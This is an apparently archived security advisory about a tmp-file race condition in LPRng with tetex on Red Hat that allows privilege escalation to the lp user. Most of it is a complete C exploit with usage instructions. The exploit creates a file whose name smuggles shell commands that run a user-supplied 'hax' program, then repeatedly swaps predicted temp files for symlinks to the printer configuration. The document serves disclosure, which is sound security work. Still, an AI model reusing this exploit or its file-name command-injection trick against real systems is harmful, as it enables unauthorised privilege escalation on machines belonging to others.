COMMAND
LPRng
SYSTEMS AFFECTED
LPRng-3.7.4-23 (and earlier) + tetex-1.0.7-7 (and earlier?)
PROBLEM
zen-parse@gmx.net found following. If the tetex package and
LPRng are installed, there is an exploitable race condition with
a tmp file that allows elevation of privs.
It's fixed in rawhide, but that doesn't really help people who
just use the provided up2date program to keep themselves secure.
/********************************************************************
Redhat Bugzilla reference:-
https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=43342
--zen-parse
important info about this exploit:
requires some fonts get made when its run.
probably won't be a problem unless someone
else has tried this exploit.
just wait 90 days for /var/lib/texmf to clear
and try again ;]
or try print something different
.dvi files are what does the trick.
********************************************************************/
int shake()
{
int f;
char r[1000];
int w;
f=fopen("/proc/loadavg","r");
fscanf(f,"%*s %*s %*s %*s %s",r);
fclose(f);
w=atoi(r);
return w;
}
void cow(char *s,char *t,int ofs)
{
sprintf(s,"/var/lib/texmf/lsR%d.tmp",ofs);
sprintf(t,"%s/lsR%d.tmp",s,ofs);
}
main()
{
char s[1000];
char t[1000];
int y,i;
printf("Put the stuff to run as lp:lp in /tmp/hax\n");
printf("the lpr /usr/share/aspe<tab>/manual.dvi\n");
printf("when the ! comes up, wait a second, then press control-C.\n\n");
printf("Then print something.\n\n\n");
close(open("/var/lib/texmf/cd ..\ncd ..\ncd ..\ncd ..\ncd ..\ncd ..\ncd tmp\nexport PATH=.\nhax\nexit 0",65,0666));
while(1)
{
i=shake();
for(y=-30;y<0;y++)
{
cow(s,t,y+i);
if(!access(t,0))
{
printf("!\n");
unlink(t);
symlink("/var/spool/lpd/lp/postscript.cfg",t);
sleep(1);
}
}
}
}
SOLUTION
Nothing yet.